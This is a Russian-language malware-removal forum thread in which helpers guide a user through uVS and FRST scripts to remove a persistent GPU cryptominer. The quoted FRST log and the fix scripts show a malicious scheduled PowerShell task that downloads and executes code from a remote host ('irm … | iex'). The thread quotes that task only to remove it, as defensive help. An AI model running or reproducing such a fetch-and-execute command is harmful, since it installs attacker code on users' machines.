Перейти к содержанию
Правила раздела

Поймал Tool.BtcMine.2794. После перезапуска системы восстанавливается вновь.

DrRybkin

Автор DrRybkin
в Помощь в удалении вирусов

 Поделиться

Рекомендуемые сообщения

safety

safety

Опубликовано
Опубликовано

Создайте дополнительно образ автозапуска в uVS:

 

1. Скачайте архив с актуальной версией утилиты uVS c зеркала программы отсюда (1) (здесь дополнительно встроен архиватор 7zip), распакуйте данный архив с программой в отдельный каталог.
2. запустите из каталога с модулями uVS файл Start.exe
(для Vista, W7- W11 выберите запуск от имени Администратора)
3. В стартовом окне программы - нажать "запустить под текущим пользователем". (если текущий пользователь с правами локального администратора)

4. Далее, меню "Файл" / Сохранить Полный образ автозапуска.

5. Дождитесь, пока процесс создания файла образа завершится.
Сохраненный файл образа автозапуска (с именем Ваш_компьютер_дата_время*.txt) автоматически добавится в архив 7z. (если используется uVS из зеркала со встроенным архиватором 7z)
6. Файл архива с образом автозапуска прикрепите к вашему сообщению на форуме.

DrRybkin

DrRybkin

Опубликовано
  • Автор
Опубликовано
В 18.05.2025 в 04:15, safety сказал:

Создайте дополнительно образ автозапуска в uVS:

 

1. Скачайте архив с актуальной версией утилиты uVS c зеркала программы отсюда (1) (здесь дополнительно встроен архиватор 7zip), распакуйте данный архив с программой в отдельный каталог.
2. запустите из каталога с модулями uVS файл Start.exe
(для Vista, W7- W11 выберите запуск от имени Администратора)
3. В стартовом окне программы - нажать "запустить под текущим пользователем". (если текущий пользователь с правами локального администратора)

4. Далее, меню "Файл" / Сохранить Полный образ автозапуска.

5. Дождитесь, пока процесс создания файла образа завершится.
Сохраненный файл образа автозапуска (с именем Ваш_компьютер_дата_время*.txt) автоматически добавится в архив 7z. (если используется uVS из зеркала со встроенным архиватором 7z)
6. Файл архива с образом автозапуска прикрепите к вашему сообщению на форуме.

Добрый день, готово

DRRYBKIN_2025-05-19_13-03-20_v5.0.RC1.v x64.7z

safety

safety

Опубликовано
Опубликовано (изменено)

По очистке системы:

 

По очистке системы в uVS

Выполните скрипт очистки в uVS

Выполните в uVS скрипт из буфера обмена.

ЗАпускаем start,exe от имени Администратора (если не запущен)

текущий пользователь,

Копируем скрипт ниже из браузера в буфер обмена. Закрываем браузер.

В главном меню uVS выбираем: "Скрипт - выполнить скрипт из буфера обмена"

Скрипт автоматически очистит систему и завершит работу с перезагрузкой системы. 

;uVS v5.0.RC1.v x64 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c
OFFSGNSAVE
hide %SystemDrive%\USERS\DRAG2\DOWNLOADS\AUTOLOGGER\AUTOLOGGER\RSIT\RSITX64.EXE
;------------------------autoscript---------------------------

apply

deltmp
delref %SystemDrive%\PROGRAM FILES\NVIDIA CORPORATION\NVCONTAINER\NVCONTAINERTELEMETRYAPI.DLL
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID]
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID]
delref {CA8A9780-280D-11CF-A24D-444553540000}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}\[CLSID]
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\134.0.6998.178\RESOURCES\WEB_STORE\ИНТЕРНЕТ-МАГАЗИН CHROME
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\134.0.6998.178\RESOURCES\PDF\CHROME PDF VIEWER
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\134.0.6998.178\RESOURCES\NETWORK_SPEECH_SYNTHESIS/MV3\GOOGLE NETWORK SPEECH
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\136.0.7103.92\RESOURCES\HANGOUT_SERVICES\GOOGLE HANGOUTS
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\WEB_STORE\ИНТЕРНЕТ-МАГАЗИН
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\EDGE_CLIPBOARD\MICROSOFT CLIPBOARD EXTENSION
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\EDGE_SUPPRESS_CONSENT_PROMPT\SUPPRESS CONSENT PROMPT
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\MEDIA_INTERNALS_SERVICES\MEDIA INTERNALS SERVICES EXTENSION
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\MICROSOFT_WEB_STORE\MICROSOFT STORE
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\EDGE_FEEDBACK\EDGE FEEDBACK
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\MICROSOFT_VOICES\MICROSOFT VOICES
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\EDGE_PDF\MICROSOFT EDGE PDF VIEWER
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\WEBRTC_INTERNALS\WEBRTC INTERNALS EXTENSION
delref %SystemDrive%\PROGRAM FILES\NVIDIA CORPORATION\NVIDIA BROADCAST\NVIDIA BROADCAST.EXE --PROCESS-START-ARGS
;-------------------------------------------------------------

restart

После перезагрузки системы:

Добавьте файл дата_времяlog.txt из папки откуда запускали uVS

+

добавьте новые логи FRST для контроля

Изменено пользователем safety
DrRybkin

DrRybkin

Опубликовано
  • Автор
Опубликовано

 

29 минут назад, safety сказал:

По очистке системы:

 

По очистке системы в uVS

Выполните скрипт очистки в uVS

Выполните в uVS скрипт из буфера обмена.

ЗАпускаем start,exe от имени Администратора (если не запущен)

текущий пользователь,

Копируем скрипт ниже из браузера в буфер обмена. Закрываем браузер.

В главном меню uVS выбираем: "Скрипт - выполнить скрипт из буфера обмена"

Скрипт автоматически очистит систему и завершит работу с перезагрузкой системы. 

;uVS v5.0.RC1.v x64 [http://dsrt.dyndns.org:8888]
;Target OS: NTv11.0
v400c
OFFSGNSAVE
hide %SystemDrive%\USERS\DRAG2\DOWNLOADS\AUTOLOGGER\AUTOLOGGER\RSIT\RSITX64.EXE
;------------------------autoscript---------------------------

apply

deltmp
delref %SystemDrive%\PROGRAM FILES\NVIDIA CORPORATION\NVCONTAINER\NVCONTAINERTELEMETRYAPI.DLL
delref {E984D939-0E00-4DD9-AC3A-7ACA04745521}\[CLSID]
delref {02BF25D5-8C17-4B23-BC80-D3488ABDDC6B}\[CLSID]
delref {166B1BCA-3F9C-11CF-8075-444553540000}\[CLSID]
delref {233C1507-6A77-46A4-9443-F871F945D258}\[CLSID]
delref {4063BE15-3B08-470D-A0D5-B37161CFFD69}\[CLSID]
delref {88D969C0-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C1-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C2-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C3-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C4-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {88D969C5-F192-11D4-A65F-0040963251E5}\[CLSID]
delref {8AD9C840-044E-11D1-B3E9-00805F499D93}\[CLSID]
delref {CA8A9780-280D-11CF-A24D-444553540000}\[CLSID]
delref {CFCDAA03-8BE4-11CF-B84B-0020AFBBCCFA}\[CLSID]
delref {D27CDB6E-AE6D-11CF-96B8-444553540000}\[CLSID]
delref {1FBA04EE-3024-11D2-8F1F-0000F87ABD16}\[CLSID]
delref {0F8604A5-4ECE-4DE1-BA7D-CF10F8AA4F48}\[CLSID]
delref {E6FB5E20-DE35-11CF-9C87-00AA005127ED}\[CLSID]
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\134.0.6998.178\RESOURCES\WEB_STORE\ИНТЕРНЕТ-МАГАЗИН CHROME
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\134.0.6998.178\RESOURCES\PDF\CHROME PDF VIEWER
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\134.0.6998.178\RESOURCES\NETWORK_SPEECH_SYNTHESIS/MV3\GOOGLE NETWORK SPEECH
delref %SystemDrive%\PROGRAM FILES\GOOGLE\CHROME\APPLICATION\136.0.7103.92\RESOURCES\HANGOUT_SERVICES\GOOGLE HANGOUTS
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\WEB_STORE\ИНТЕРНЕТ-МАГАЗИН
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\EDGE_CLIPBOARD\MICROSOFT CLIPBOARD EXTENSION
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\EDGE_SUPPRESS_CONSENT_PROMPT\SUPPRESS CONSENT PROMPT
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\MEDIA_INTERNALS_SERVICES\MEDIA INTERNALS SERVICES EXTENSION
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\MICROSOFT_WEB_STORE\MICROSOFT STORE
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\EDGE_FEEDBACK\EDGE FEEDBACK
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\MICROSOFT_VOICES\MICROSOFT VOICES
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\EDGE_PDF\MICROSOFT EDGE PDF VIEWER
delref %SystemDrive%\PROGRAM FILES (X86)\MICROSOFT\EDGE\APPLICATION\134.0.3124.93\RESOURCES\WEBRTC_INTERNALS\WEBRTC INTERNALS EXTENSION
delref %SystemDrive%\PROGRAM FILES\NVIDIA CORPORATION\NVIDIA BROADCAST\NVIDIA BROADCAST.EXE --PROCESS-START-ARGS
;-------------------------------------------------------------

restart

После перезагрузки системы:

Добавьте файл дата_времяlog.txt из папки откуда запускали uVS

+

добавьте новые логи FRST для контроля


Готово

2025-05-19_14-06-21_log.txt FRST.txt Addition.txt

safety

safety

Опубликовано
Опубликовано

Эта задача известна вам?

Цитата

C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [454656 2025-03-06] (Microsoft Windows -> Microsoft Corporation) -> -Command "irm hxxps://activate.techias.co.uk/ | iex" <==== ВНИМАНИЕ

 

thyrex

thyrex

Опубликовано
Опубликовано

Эта задача левая. Под снос.

DrRybkin

DrRybkin

Опубликовано
  • Автор
Опубликовано
33 минуты назад, safety сказал:

Эта задача известна вам?

 

Нет, не представляю за что она отвечает

safety

safety

Опубликовано
Опубликовано (изменено)

 

1 час назад, DrRybkin сказал:

Нет, не представляю за что она отвечает

Система лицензионная?

 

Выполните скрипт очистки в FRST

Запускаем FRST.exe от имени Администратора (если не запущен)

Копируем скрипт из браузера в буфер обмена, браузер закрываем.

Ждем, когда будет готов к работе,

Нажимаем в FRST кнопку "исправить".

Скрипт очистит систему, и завершит работу c перезагрузкой системы 

Start::
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [454656 2025-03-06] (Microsoft Windows -> Microsoft Corporation) -> -Command "irm hxxps://activate.techias.co.uk/ | iex" <==== ВНИМАНИЕ
Reboot::
End::

После перезагрузки:

Добавьте файл Fixlog.txt из папки, откуда запускали FRST, в ваше сообщение

Понаблюдайте за работой системы, напишите по результату.

Изменено пользователем safety
DrRybkin

DrRybkin

Опубликовано
  • Автор
Опубликовано
1 час назад, safety сказал:

 

Система лицензионная?

 

Выполните скрипт очистки в FRST

Запускаем FRST.exe от имени Администратора (если не запущен)

Копируем скрипт из браузера в буфер обмена, браузер закрываем.

Ждем, когда будет готов к работе,

Нажимаем в FRST кнопку "исправить".

Скрипт очистит систему, и завершит работу c перезагрузкой системы 

Start::
C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe [454656 2025-03-06] (Microsoft Windows -> Microsoft Corporation) -> -Command "irm hxxps://activate.techias.co.uk/ | iex" <==== ВНИМАНИЕ
Reboot::
End::

После перезагрузки:

Добавьте файл Fixlog.txt из папки, откуда запускали FRST, в ваше сообщение

Понаблюдайте за работой системы, напишите по результату.

Готово. Нагрузка упала на видеокарту. Вроде проблем больше нет. Единственное уточнение, в автозапуске остались данные процессы и путь к ним (скриншот 1.image.thumb.png.c93fab80c1a47f6ad97f701d9353fabe.png)

Fixlog.txt

safety

safety

Опубликовано
Опубликовано

Такой скрипт еще выполните в FRST

  

Start::
Task: {F8D45727-6440-4C96-A0E6-12A120F8945C} - System32\Tasks\Microsoft\Office\Office Persistent Activation => 
Reboot::
End::

После перезагрузки:

Добавьте файл Fixlog.txt из папки, откуда запускали FRST, в ваше сообщение

Понаблюдайте за работой системы, напишите по результату.

 

Пожалуйста, войдите, чтобы комментировать

Вы сможете оставить комментарий после входа в



Войти
 Поделиться
Перейти к списку тем

  • Похожий контент

    • Николай212322122
      Вирус майнер realtek hd audio не удаляться до конца
      Автор Николай212322122
      Переустановили винду в сервизном центре. По приходу домой обнаружил вирус realtek hd audio, который включается по автозагрузке и не дает скачать антивирусы. Dr web cureit получилось перекинуть через месенжер и сделать проверку, он нашел большое количество угроз. Но не все смог вылечить, я скачал Kaspersky virus removal tool и он тоже нашел вирусы. Я запускал несколько раз эти утелиты и вроде бы угроз больше не обнаруживается. Но в автозагрузках я опять вижу realtek hd audio выключенным с автозагрузок , хотя после первого сканирование он был вообще удален.
       
      Сейчас Dr web cureit и Kaspersky virus removal tool ничего не находит и realtek hd audio выключен с автозагрузок и я могу вписывать антивирус в бразуер и он сразу не закрывается, так же могу зайти ProgramData. Но все равно realtek hd audio весит в автозагрузках и когда первый раз запускал Dr web cureit он написал что не все вылечил, так что есть подозрение что вирус еще на компьютере остался.
       
      Подскажите пж, что делать?
       
      Прикрепить логи от Dr web cureit не получаеться так как они больше 5 мб. Где получить логи от Kaspersky virus removal tool я не нашел. Подскажите как отправить логи
    • AndreyGrom89
      Вирус\майнер CAAServise
      Автор AndreyGrom89
      Доброго времени суток. Недавно обнаружил повышенную нагрузку на ГП. В диспетчере задач было обнаружено два процесса microsoft network realtime inspection service, один из которых и грузил карту. Поиском в инете нашел инфу о возможном майнере. Выполнил рекомендации из поста, не на данном форуме, рекомендации помогли, но увы не надолго, после некоторого времени проблема появилась вновь. Сегодня наткнулся на этот форум с похожей темой. Проверял комп Defender`ом, он проблему не находил. Обнаружил данный "файл" в исключениях, удалил оттуда. По рекомендации с соседней темы скачал FRST, сделал проверку, результаты прикрепил. Какие дальнейшие действия можно применить??
      Addition.txt FRST.txt
    • Fasolka
      Не получается удалить Trojan.Siggen31.49942
      Автор Fasolka
      Обьект: app.dll             Путь: C:\Users\lucif\AppData\Local\Temp\310HkrIkW1H0uUQZkVZi2Qlb5qF\resources\app.asar.unpacked\dist\electron\assets\app.dll
    • Владхелп
      [РЕШЕНО] Подозрение на вирус, подвисания
      Автор Владхелп
      Здравствуйте,
      Недавно переносил файлы с флешки друга, после этого начал подвисать и греться ноутбук, защитник ничего не видит
      CollectionLog-2025.12.22-22.00.zip
    • shougo04
      [РЕШЕНО] Client Helper вирус, помогите
      Автор shougo04
      Всем привет. Первый раз пишу сюда, отчаялся сильно. Уже качал Malwarebytes который на компе выявил 1 троян, несколько значений реестра от программы DriverIdentifier и что-то ещё, что я забыл. После того как я всё это удалил, вручную почистил реестр от подозрительных, старых, лишних значений, всё равно тыкаю Диспетчер задач - нагрузка ЦП (не видюхи) 40%+ и при открытии диспетчера падает соответственно до 1-3%. Так же использовал программу M1nerSearch, которая так же удалила 4 файла и 1 значение реестра по-моему, лог сохранился, если что прикреплю. 
       
      Я зашёл в Speccy и там обнаружил вкладку "планировщик задач" где увидел очень подозрительные процессы.  В планировщике задач обнаружил Client Helper(который MinerSearch как вирус определял), и Edgeupdate которые как я выяснил могут являться знаками наличия вируса. Вирусы получал крайне редко, и то очень давно, поэтому несильно шарю в них, извините.
      Я сейчас скачаю программу Revo uninstaller и попробую с помощью неё ещё что-нибудь сделать. Так же отмечу что вытаскивал кабель инета, устанавливал CCleaner, чистил комп, чистил реестр с помощью неё, потом обратно инет подключал. Так же исправлял ошибки реестра программой Wise Registry Cleaner.
       
      На всякий случай прикрепил 2 лога от MinerSearch, 1-й в котором указаны кол-во запусков 1 это тот лог, который при первом запуске мне и показал 5 проблем. 
      2 лог это лог уже второй проверки после всех вышеописанных манипуляций с ПК, он не обнаружил проблем, но как видите они остались, так что хз.
       
       
      Скрин подозрительной активности в Планировщике.
       
       
      MinerSearch_12_17_2025_7-15-07_PM.log MinerSearch_12_17_2025_8-23-48_PM.log
×
×
  • Создать...